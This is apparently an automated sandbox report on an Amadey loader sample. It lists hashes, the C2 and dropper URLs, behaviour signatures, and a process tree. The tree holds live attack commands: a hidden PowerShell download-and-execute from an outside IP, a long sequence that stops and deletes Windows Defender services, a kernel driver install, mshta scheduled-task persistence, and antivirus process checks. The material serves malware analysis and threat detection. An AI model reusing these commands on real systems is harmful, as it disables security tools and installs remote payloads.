Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    24/03/2025, 07:54

General

  • Target

    7af72d60902f6d9bd4ddb565cd4b0946.exe

  • Size

    1.8MB

  • MD5

    7af72d60902f6d9bd4ddb565cd4b0946

  • SHA1

    9a81b3d5d58e5f5ad4719dcf4ff3f5c59aebbebc

  • SHA256

    5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5

  • SHA512

    d4429d47082bb917e84a031cf71fb62fdbf4c7b77febde69fee4188b21da2d97b00d3f02d25f08226124b84a7df030a6d00ffd1fc43df66a1554582f5b462c50

  • SSDEEP

    49152:Sw+XuSlBp9q3mmc5+d8hJC6gPJ/ReTbdVM:pAuSl39q3mmc5+d8nNgFReTZV

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 1 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 11 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 23 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 48 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 46 IoCs
  • Drops file in Windows directory 8 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 40 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1100
      • C:\Users\Admin\AppData\Local\Temp\7af72d60902f6d9bd4ddb565cd4b0946.exe
        "C:\Users\Admin\AppData\Local\Temp\7af72d60902f6d9bd4ddb565cd4b0946.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2876
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2596
          • C:\Users\Admin\AppData\Local\Temp\10313630101\cUpXaxB.exe
            "C:\Users\Admin\AppData\Local\Temp\10313630101\cUpXaxB.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:2932
          • C:\Users\Admin\AppData\Local\Temp\10314650101\apple.exe
            "C:\Users\Admin\AppData\Local\Temp\10314650101\apple.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2912
            • C:\Users\Admin\AppData\Local\Temp\11.exe
              "C:\Users\Admin\AppData\Local\Temp\11.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:468
              • C:\Windows\system32\cmd.exe
                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ADEB.tmp\ADEC.tmp\ADED.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2204
                • C:\Users\Admin\AppData\Local\Temp\11.exe
                  "C:\Users\Admin\AppData\Local\Temp\11.exe" go
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  • Suspicious use of WriteProcessMemory
                  PID:2304
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AE78.tmp\AE79.tmp\AE7A.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
                    8⤵
                    • Drops file in Program Files directory
                    • Suspicious use of WriteProcessMemory
                    PID:2272
                    • C:\Windows\system32\sc.exe
                      sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                      9⤵
                      • Launches sc.exe
                      PID:972
                    • C:\Windows\system32\sc.exe
                      sc start ddrver
                      9⤵
                      • Launches sc.exe
                      PID:2200
                    • C:\Windows\system32\timeout.exe
                      timeout /t 1
                      9⤵
                      • Delays execution with timeout.exe
                      PID:1652
                    • C:\Windows\system32\sc.exe
                      sc stop ddrver
                      9⤵
                      • Launches sc.exe
                      PID:2432
                    • C:\Windows\system32\sc.exe
                      sc start ddrver
                      9⤵
                      • Launches sc.exe
                      PID:2240
                    • C:\Windows\system32\takeown.exe
                      takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                      9⤵
                      • Possible privilege escalation attempt
                      • Modifies file permissions
                      PID:2420
                    • C:\Windows\system32\icacls.exe
                      icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                      9⤵
                      • Possible privilege escalation attempt
                      • Modifies file permissions
                      PID:2168
                    • C:\Windows\system32\sc.exe
                      sc stop "WinDefend"
                      9⤵
                      • Launches sc.exe
                      PID:2452
                    • C:\Windows\system32\sc.exe
                      sc delete "WinDefend"
                      9⤵
                      • Launches sc.exe
                      PID:2336
                    • C:\Windows\system32\reg.exe
                      reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                      9⤵
                        PID:1976
                      • C:\Windows\system32\sc.exe
                        sc stop "MDCoreSvc"
                        9⤵
                        • Launches sc.exe
                        PID:2460
                      • C:\Windows\system32\sc.exe
                        sc delete "MDCoreSvc"
                        9⤵
                        • Launches sc.exe
                        PID:1416
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                        9⤵
                          PID:952
                        • C:\Windows\system32\sc.exe
                          sc stop "WdNisSvc"
                          9⤵
                          • Launches sc.exe
                          PID:1016
                        • C:\Windows\system32\sc.exe
                          sc delete "WdNisSvc"
                          9⤵
                          • Launches sc.exe
                          PID:844
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                          9⤵
                            PID:1132
                          • C:\Windows\system32\sc.exe
                            sc stop "Sense"
                            9⤵
                            • Launches sc.exe
                            PID:2224
                          • C:\Windows\system32\sc.exe
                            sc delete "Sense"
                            9⤵
                            • Launches sc.exe
                            PID:2552
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                            9⤵
                              PID:280
                            • C:\Windows\system32\sc.exe
                              sc stop "wscsvc"
                              9⤵
                              • Launches sc.exe
                              PID:1928
                            • C:\Windows\system32\sc.exe
                              sc delete "wscsvc"
                              9⤵
                              • Launches sc.exe
                              PID:1004
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                              9⤵
                                PID:2536
                              • C:\Windows\system32\sc.exe
                                sc stop "SgrmBroker"
                                9⤵
                                • Launches sc.exe
                                PID:796
                              • C:\Windows\system32\sc.exe
                                sc delete "SgrmBroker"
                                9⤵
                                • Launches sc.exe
                                PID:1288
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                9⤵
                                  PID:2344
                                • C:\Windows\system32\sc.exe
                                  sc stop "SecurityHealthService"
                                  9⤵
                                  • Launches sc.exe
                                  PID:1644
                                • C:\Windows\system32\sc.exe
                                  sc delete "SecurityHealthService"
                                  9⤵
                                  • Launches sc.exe
                                  PID:1792
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                  9⤵
                                    PID:3068
                                  • C:\Windows\system32\sc.exe
                                    sc stop "webthreatdefsvc"
                                    9⤵
                                    • Launches sc.exe
                                    PID:1216
                                  • C:\Windows\system32\sc.exe
                                    sc delete "webthreatdefsvc"
                                    9⤵
                                    • Launches sc.exe
                                    PID:1476
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                    9⤵
                                      PID:1472
                                    • C:\Windows\system32\sc.exe
                                      sc stop "webthreatdefusersvc"
                                      9⤵
                                      • Launches sc.exe
                                      PID:1668
                                    • C:\Windows\system32\sc.exe
                                      sc delete "webthreatdefusersvc"
                                      9⤵
                                      • Launches sc.exe
                                      PID:1708
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                      9⤵
                                        PID:2500
                                      • C:\Windows\system32\sc.exe
                                        sc stop "WdNisDrv"
                                        9⤵
                                        • Launches sc.exe
                                        PID:1656
                                      • C:\Windows\system32\sc.exe
                                        sc delete "WdNisDrv"
                                        9⤵
                                        • Launches sc.exe
                                        PID:908
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                        9⤵
                                          PID:620
                                        • C:\Windows\system32\sc.exe
                                          sc stop "WdBoot"
                                          9⤵
                                          • Launches sc.exe
                                          PID:936
                                        • C:\Windows\system32\sc.exe
                                          sc delete "WdBoot"
                                          9⤵
                                          • Launches sc.exe
                                          PID:2312
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                          9⤵
                                            PID:1600
                                          • C:\Windows\system32\sc.exe
                                            sc stop "WdFilter"
                                            9⤵
                                            • Launches sc.exe
                                            PID:2412
                                          • C:\Windows\system32\sc.exe
                                            sc delete "WdFilter"
                                            9⤵
                                            • Launches sc.exe
                                            PID:316
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                            9⤵
                                              PID:1856
                                            • C:\Windows\system32\sc.exe
                                              sc stop "SgrmAgent"
                                              9⤵
                                              • Launches sc.exe
                                              PID:1912
                                            • C:\Windows\system32\sc.exe
                                              sc delete "SgrmAgent"
                                              9⤵
                                              • Launches sc.exe
                                              PID:2352
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                              9⤵
                                                PID:1964
                                              • C:\Windows\system32\sc.exe
                                                sc stop "MsSecWfp"
                                                9⤵
                                                • Launches sc.exe
                                                PID:1908
                                              • C:\Windows\system32\sc.exe
                                                sc delete "MsSecWfp"
                                                9⤵
                                                • Launches sc.exe
                                                PID:1888
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                9⤵
                                                  PID:1920
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "MsSecFlt"
                                                  9⤵
                                                  • Launches sc.exe
                                                  PID:376
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "MsSecFlt"
                                                  9⤵
                                                  • Launches sc.exe
                                                  PID:640
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                  9⤵
                                                    PID:556
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "MsSecCore"
                                                    9⤵
                                                    • Launches sc.exe
                                                    PID:1744
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "MsSecCore"
                                                    9⤵
                                                    • Launches sc.exe
                                                    PID:1204
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                    9⤵
                                                      PID:2492
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                      9⤵
                                                        PID:1424
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                        9⤵
                                                          PID:900
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                          9⤵
                                                            PID:2036
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                            9⤵
                                                              PID:2408
                                                            • C:\Windows\system32\sc.exe
                                                              sc stop ddrver
                                                              9⤵
                                                              • Launches sc.exe
                                                              PID:1704
                                                            • C:\Windows\system32\sc.exe
                                                              sc delete ddrver
                                                              9⤵
                                                              • Launches sc.exe
                                                              PID:2732
                                                  • C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:2828
                                                  • C:\Users\Admin\AppData\Local\Temp\10317930101\ab962500b4.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10317930101\ab962500b4.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SendNotifyMessage
                                                    PID:2952
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c schtasks /create /tn V16xQmaUlQi /tr "mshta C:\Users\Admin\AppData\Local\Temp\lwd6oFx5T.hta" /sc minute /mo 25 /ru "Admin" /f
                                                      5⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2784
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /create /tn V16xQmaUlQi /tr "mshta C:\Users\Admin\AppData\Local\Temp\lwd6oFx5T.hta" /sc minute /mo 25 /ru "Admin" /f
                                                        6⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Scheduled Task/Job: Scheduled Task
                                                        PID:2676
                                                    • C:\Windows\SysWOW64\mshta.exe
                                                      mshta C:\Users\Admin\AppData\Local\Temp\lwd6oFx5T.hta
                                                      5⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Modifies Internet Explorer settings
                                                      PID:3008
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'9XJX5TIBYRI8POWGRAZGEM48IGASZSC6.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                        6⤵
                                                        • Blocklisted process makes network request
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Downloads MZ/PE file
                                                        • Loads dropped DLL
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:684
                                                        • C:\Users\Admin\AppData\Local\Temp9XJX5TIBYRI8POWGRAZGEM48IGASZSC6.EXE
                                                          "C:\Users\Admin\AppData\Local\Temp9XJX5TIBYRI8POWGRAZGEM48IGASZSC6.EXE"
                                                          7⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:1616
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\10317940121\am_no.cmd" "
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2028
                                                    • C:\Windows\SysWOW64\timeout.exe
                                                      timeout /t 2
                                                      5⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Delays execution with timeout.exe
                                                      PID:2636
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                      5⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2256
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2432
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                      5⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1480
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1608
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                      5⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1924
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1548
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /create /tn "FKg4jmaEJlj" /tr "mshta \"C:\Temp\dnCgo7hYU.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                      5⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Scheduled Task/Job: Scheduled Task
                                                      PID:2312
                                                    • C:\Windows\SysWOW64\mshta.exe
                                                      mshta "C:\Temp\dnCgo7hYU.hta"
                                                      5⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Modifies Internet Explorer settings
                                                      PID:1140
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                        6⤵
                                                        • Blocklisted process makes network request
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Downloads MZ/PE file
                                                        • Loads dropped DLL
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1964
                                                        • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                          7⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:1956
                                                  • C:\Users\Admin\AppData\Local\Temp\10318410101\OkH8IPF.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10318410101\OkH8IPF.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:2816
                                                    • C:\Windows\system32\WerFault.exe
                                                      C:\Windows\system32\WerFault.exe -u -p 2816 -s 36
                                                      5⤵
                                                      • Loads dropped DLL
                                                      PID:2680
                                                  • C:\Users\Admin\AppData\Local\Temp\10318420101\y0u3d_003.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10318420101\y0u3d_003.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1640
                                                  • C:\Users\Admin\AppData\Local\Temp\10318430101\tK0oYx3.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10318430101\tK0oYx3.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:2844
                                                    • C:\Windows\system32\WerFault.exe
                                                      C:\Windows\system32\WerFault.exe -u -p 2844 -s 36
                                                      5⤵
                                                      • Loads dropped DLL
                                                      PID:1160
                                                  • C:\Users\Admin\AppData\Local\Temp\10318440101\zx4PJh6.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10318440101\zx4PJh6.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Drops file in Windows directory
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1784
                                                    • C:\Windows\SysWOW64\CMD.exe
                                                      "C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat
                                                      5⤵
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2256
                                                      • C:\Windows\SysWOW64\tasklist.exe
                                                        tasklist
                                                        6⤵
                                                        • Enumerates processes with tasklist
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:296
                                                      • C:\Windows\SysWOW64\findstr.exe
                                                        findstr /I "opssvc wrsa"
                                                        6⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:1288
                                                      • C:\Windows\SysWOW64\tasklist.exe
                                                        tasklist
                                                        6⤵
                                                        • Enumerates processes with tasklist
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2424
                                                      • C:\Windows\SysWOW64\findstr.exe
                                                        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                        6⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2184
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c md 440824
                                                        6⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:304
                                                      • C:\Windows\SysWOW64\extrac32.exe
                                                        extrac32 /Y /E Architecture.wmv
                                                        6⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:900
                                                      • C:\Windows\SysWOW64\findstr.exe
                                                        findstr /V "Offensive" Inter
                                                        6⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2752
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com
                                                        6⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2140
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h
                                                        6⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2876
                                                      • C:\Users\Admin\AppData\Local\Temp\440824\Organizations.com
                                                        Organizations.com h
                                                        6⤵
                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of SendNotifyMessage
                                                        PID:2296
                                                      • C:\Windows\SysWOW64\choice.exe
                                                        choice /d y /t 5
                                                        6⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2936
                                                  • C:\Users\Admin\AppData\Local\Temp\10318450101\cUpXaxB.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10318450101\cUpXaxB.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:3044
                                                  • C:\Users\Admin\AppData\Local\Temp\10318460101\Jq0hGDZ.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10318460101\Jq0hGDZ.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:2320
                                                  • C:\Users\Admin\AppData\Local\Temp\10318550101\eb646ddb34.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10318550101\eb646ddb34.exe"
                                                    4⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    • Modifies system certificate store
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2480
                                                  • C:\Users\Admin\AppData\Local\Temp\10318560101\032a5abc0c.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10318560101\032a5abc0c.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:2496
                                                    • C:\Windows\system32\WerFault.exe
                                                      C:\Windows\system32\WerFault.exe -u -p 2496 -s 36
                                                      5⤵
                                                      • Loads dropped DLL
                                                      PID:2920
                                                  • C:\Users\Admin\AppData\Local\Temp\10318570101\61c6cff00e.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10318570101\61c6cff00e.exe"
                                                    4⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Loads dropped DLL
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious use of SetThreadContext
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:844
                                                    • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10318570101\61c6cff00e.exe"
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2296
                                                  • C:\Users\Admin\AppData\Local\Temp\10318580101\b0cdaa23ea.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10318580101\b0cdaa23ea.exe"
                                                    4⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Loads dropped DLL
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious use of SetThreadContext
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
